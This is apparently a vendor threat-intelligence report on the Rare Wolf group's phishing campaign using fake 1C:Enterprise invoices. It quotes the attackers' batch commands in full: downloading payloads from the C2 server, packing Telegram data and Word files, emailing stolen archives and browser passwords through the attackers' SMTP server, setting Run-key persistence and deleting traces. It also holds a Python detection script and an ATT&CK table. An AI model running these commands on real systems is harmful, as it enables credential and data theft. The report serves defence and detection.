Rare Wolf preys on sensitive data using fake 1C:Enterprise invoices as a lure
BI.ZONE Threat Intelligence specialists have discovered a cybercriminal group that has been active since at least 2019. While this cluster of activity was previously directed against the countries neighboring Russia, such attacks have now reached Russia itself. The attackers use phishing emails to install a legitimate monitoring tool, Mipko Employee Monitor, on target devices, gain access to the victims' Telegram messenger data, and steal sensitive documents and passwords.
- Unusual attachment formats tend to lower the victim's guard and increase the likelihood of a compromise.
- Hijacking and stealing Telegram accounts is particularly popular, not least because accessing the user's data is as easy as copying a single folder.
- Attackers make extensive use of legitimate monitoring tools, which allows them to stay under cover inside the compromised IT infrastructure.
The criminals sent phishing emails with archives that, as they claimed, contained 1C:Enterprise invoices and their digital keys. This drew the victims' attention away from the file extension. The content of the message is shown in the figure below.
The archive contained an executable, `1C.Предприятие Платежная накладная № 579823592352-2023.scr`, which was a Smart Install Maker installer.
Running the executable file caused the following actions:
- Creation of the folder `C:\Intel\` with the attributes Hidden, System, and Unindexed.
- Creation of the keys `Video Configurations` and `Mail Configurations` in the registry hive `Software\Microsoft\Windows\CurrentVersion\Run`. Their values were set to the file paths `C:\Intel\go.exe` and `C:\Intel\mail.exe`, which would be unpacked later.
- Creation of the file `C:\Intel\rezet.cmd`, which used cURL to download encrypted archives from the C2 server along with `driver.exe` to unpack them:

```bat
C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe
C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar http://acountservices[.]nl/downs/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar http://acountservices[.]nl/downs/pas.rar
```
In addition, `driver.exe` was used to collect and archive all Microsoft Word documents:

```bat
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y
```

Telegram messenger data was also collected and packaged:

```bat
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y
```

The attackers sent the collected data through a mail service under their control. For this purpose, they extracted the Blat utility from the `pas.rar` archive and used it to send emails from the command line:

```bat
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y
```

Then both archives were sent to the attackers' email account:

```bat
C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\tdata.rar"
C:\Intel\blat.exe -to %mail-in% -f "DOCUMENT<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\doc.rar"
```

After sending, the archives with the collected data and the cURL utility were deleted:

```bat
del /q C:\Intel\curl.exe
del /q /f C:\Intel\doc.rar
del /q /f C:\Intel\tdata.rar
```
Next, the `go.exe` file was extracted from the `keys.rar` archive. Execution was then paused for an hour using the ping utility, after which the files `mail.exe` and `userprofile.exe` were extracted from the archives. The latter was launched to install Mipko Employee Monitor on the compromised system:

```bat
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
ping -n 3600 127.0.0.1
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
C:\Intel\userprofile.exe
```

At this point, the system was forced to reboot and the `rezet.cmd` file was deleted:

```bat
wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
del /q C:\Intel\rezet.cmd
```

After rebooting, the files `mail.exe` and `go.exe` were executed.

Launching `mail.exe` led to the following actions:
- Passwords from browsers on the compromised device were collected into a `password.txt` file. To do this, the WebBrowserPassView tool was extracted from the `pas.rar` archive:

  ```bat
  C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
  C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"
  ```

- Once the passwords had been retrieved, the files no longer required for execution were deleted:

  ```bat
  del /q /f C:\Intel\wbpv.exe
  del /q /f C:\Intel\pas.rar
  del /q /f C:\Intel\rezet.cmd
  del /q /f C:\Intel\driver.exe
  ```

- The registry key responsible for `mail.exe` autorun was also deleted:

  ```bat
  reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Mail Configurations" /f
  ```

- This was followed by a check of the availability of the network resource `www.msftncsi.com/ncsi.txt`. If the check succeeded, the harvested user credentials were emailed to the attackers using the Blat utility:

  ```bat
  curl www.msftncsi.com/ncsi.txt >nul
  if "%errorlevel%"=="0" (
  goto ok
  ) else (
  goto no
  )
  :ok
  C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server [REDACTED] -port 587 -u %mail-out% -pw %pass-out% -subject "Password %COMPUTERNAME%/%USERNAME%" -body "Password %COMPUTERNAME%/%USERNAME%" -attach "C:\Intel\password.txt"
  ```

- The files `go.exe`, `password.txt`, and `blat.exe` were deleted at this point:

  ```bat
  del /q /f C:\Intel\go.exe
  del /q /f C:\Intel\password.txt
  del /q /f C:\Intel\blat.exe
  ```
Running `go.exe` triggered the following actions:

- Remove the Mipko Employee Monitor configuration if it is present on the system:

  ```bat
  del /q /f %PROGRAMDATA%\MPK\S0000
  ```

- Unpack all files from `keys.rar` into the `C:\Intel` folder:

  ```bat
  C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\keys.rar C:\Intel\ /y
  ```

- Unpack the `MPK.rar` archive containing the connection configuration into the folder `C:\Users\[user]\AppData\Local\`:

  ```bat
  C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\MPK.rar %PROGRAMDATA% /y
  ```

- Move the file from `C:\Users\[user]\AppData\Local\MPK\S0000.txt` to `C:\Users\[user]\AppData\Local\MPK\S0000`:

  ```bat
  ren %PROGRAMDATA%\MPK\S0000.txt %PROGRAMDATA%\MPK\S0000
  ```

- Add the `Userinit` key in the registry hive `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` to launch Mipko Employee Monitor at system startup:

  ```bat
  reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f
  ```

- Launch Mipko Employee Monitor:

  ```bat
  start C:\Intel\userprofile.exe
  ```

- Delete temporary files that may be in the `C:\Intel\` folder:

  ```bat
  del /q /f C:\Intel\MPK.rar
  del /q /f C:\Intel\keys.rar
  del /q /f C:\Intel\curl.exe
  del /q /f C:\Intel\dc.exe
  del /q /f C:\Intel\dc.rar
  del /q /f C:\Intel\rezet.cmd
  del /q /f C:\Intel\open.lnk
  del /q /f C:\Intel\go.exe
  del /q /f C:\Intel\go1.exe
  del /q /f C:\Intel\mail.exe
  ```

- Delete the registry key responsible for the autorun of `go.exe`:

  ```bat
  reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Video Configurations" /f
  ```
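As an added detection-side example (not BI.ZONE's code), the command lines quoted above can be turned into behavioural rules and correlated per host, so that a single host showing several stages of the chain is surfaced rather than each event in isolation. The Sysmon-style field names and the sample events are constructed for illustration; the domain and paths come from the report.

```python
import re

# Detection rules derived from the command lines quoted in the report; each is applied case-insensitively.
RULES = {
    # curl.exe writing downloads into the hidden C:\Intel staging folder
    "curl_to_staging": re.compile(r'\bcurl(?:\.exe)?\s+-o\s+"?c:\\intel\\', re.I),
    # RAR-style "a -r -hp<password>" archiving of Telegram tdata or of all *.doc* files
    "rar_exfil_archive": re.compile(r'\ba\s+-r\s+-hp\S+\s.*(?:telegram desktop\\tdata|\\\*\.doc\*)', re.I),
    # Blat mailing an attachment through an external SMTP server
    "blat_smtp_exfil": re.compile(r'\bblat(?:\.exe)?\b.*\s-server\s.*\s-attach\s', re.I),
    # Run-key value named Userinit whose target lies outside System32
    "run_key_userinit": re.compile(r'\breg\s+add\s+"?hkcu\\software\\microsoft\\windows\\currentversion\\run"?'
                                   r'\s+/v\s+userinit\s.*?/d\s+(?!"?c:\\windows\\system32\\)', re.I),
    # Run-key values "Video Configurations" / "Mail Configurations" being added or removed
    "run_key_configurations": re.compile(r'\breg\s+(?:add|delete)\s.*\s/v\s+"?(?:video|mail) configurations', re.I),
    # forced reboot through WMI right after the monitoring tool is dropped
    "wmic_forced_reboot": re.compile(r'\bwmic\s+os\s.*\bwin32shutdown\s+6\b', re.I),
}
PING_SLEEP = re.compile(r'\bping\s+-n\s+(\d+)\s+127\.0\.0\.1', re.I)

def match_rules(cmdline: str) -> list:
    """Names of every rule that fires on one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    m = PING_SLEEP.search(cmdline)
    if m and int(m.group(1)) >= 600:  # ping abused as a delay of ten minutes or more
        hits.append("ping_sleep")
    return hits

def triage(events: list) -> dict:
    """Rule hits per host, keeping only hosts where two or more distinct rules fired."""
    per_host = {}  # host -> set of rule names
    for ev in events:
        if hits := match_rules(ev["cmdline"]):
            per_host.setdefault(ev["host"], set()).update(hits)
    return {host: hits for host, hits in per_host.items() if len(hits) >= 2}

# Constructed sample events (Sysmon Event ID 1 style; the field names are assumed).
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmdline": r'C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar'},
    {"host": "WS-01", "cmdline": r'C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\ivan\AppData\Roaming\Telegram Desktop\tdata" /y'},
    {"host": "WS-01", "cmdline": r'C:\Intel\blat.exe -to r@x -f "TELEGRAM<s@x>" -server smtp.acountservices[.]nl -port 587 -u s@x -pw p -attach "C:\Intel\tdata.rar"'},
    {"host": "WS-01", "cmdline": r'ping -n 3600 127.0.0.1'},
    {"host": "WS-01", "cmdline": r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f'},
    {"host": "WS-02", "cmdline": r'ping -n 4 127.0.0.1'},  # benign short wait, below the threshold
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, sorted(hits))
```

The per-host threshold of two distinct rules keeps a lone `ping -n` or a legitimate `reg add` from paging anyone, while the full chain on `WS-01` is flagged.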
Mipko Employee Monitor allows the attackers to monitor user activity, intercept keystrokes and clipboard contents, and record screen activity and the device camera.
Cybercriminals continue to leverage dual-use software and legitimate tools to launch targeted attacks. This often allows them to blend into the compromised IT infrastructure and bypass multiple defenses. In addition, it is important to monitor the threat landscape of neighboring countries: attackers may change their targets over time, influenced by geopolitical events, among other things.
Tactic | Technique | Procedure |
---|---|---|
Initial Access | Phishing: Spearphishing Attachment | Rare Wolf uses emails containing malicious attachments to gain initial access |
Execution | User Execution: Malicious File | To initiate the compromise process, the victim needs to launch the malicious file |
Execution | Command and Scripting Interpreter: Windows Command Shell | Rare Wolf uses |
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Rare Wolf uses the registry branches responsible for autoloading to gain persistence in the system |
Privilege Escalation | Abuse Elevation Control Mechanism: Bypass User Account Control | Smart Install Maker asks the user for administrator privileges for privileged execution |
Defense Evasion | Abuse Elevation Control Mechanism: Bypass User Account Control | Smart Install Maker asks the user for administrator privileges for privileged execution |
Defense Evasion | Hide Artifacts: Hidden Files and Directories | The folder |
Defense Evasion | Indicator Removal: File Deletion | The file The files in |
Defense Evasion | Indicator Removal: Clear Persistence | When executing |
Defense Evasion | Masquerading | The executable files used by Rare Wolf in gaining initial access are disguised as Microsoft Word documents |
Defense Evasion | Modify Registry | Rare Wolf uses registry hives responsible for autoloading to gain persistence in the system |
Credential Access | Credentials from Password Stores: Credentials from Web Browsers | Rare Wolf downloads WebBrowserPassView (a program to retrieve user credentials from browsers) onto the compromised device |
Credential Access | Keylogging | Mipko Employee Monitor allows attackers to access keystroke records |
Discovery | File and Directory Discovery | |
Discovery | Process Discovery | Mipko Employee Monitor allows attackers to access the processes running on the system |
Discovery | Log Enumeration | Mipko Employee Monitor accesses Windows logs to collect information during execution |
Collection | Archive Collected Data | The resulting files collected by |
Collection | Automated Collection | Mipko Employee Monitor collects data on a compromised device without the intervention of the attacker |
Collection | Clipboard Data | Mipko Employee Monitor allows attackers to access clipboard history |
Collection | Data from Local System | |
Collection | Data Staged: Local Data Staging | Archives with the collected files remain on the compromised system until they are sent to the C2 server |
Collection | Screen Capture | Mipko Employee Monitor allows attackers to access screenshots taken on a compromised system |
Collection | Video Capture | Mipko Employee Monitor allows attackers to access screenshots taken on a compromised system |
Command and Control | Application Layer Protocol: Mail Protocols | |
Command and Control | Application Layer Protocol: Web Protocols | Rare Wolf uses HTTP to download tools |
Command and Control | Ingress Tool Transfer | All additional software is downloaded from the C2 as archives |
Command and Control | Remote Access Software | Rare Wolf uses Mipko Employee Monitor to gain access to a compromised system |
A full list of the indicators of compromise is available to the users of BI.ZONE Threat Intelligence.
Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
Legitimate tools are applied more and more often today to attack companies. Preventive defenses do not detect such methods—the intruders penetrate the infrastructure unnoticed. To discover such attacks, we recommend that companies implement detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their security operations center.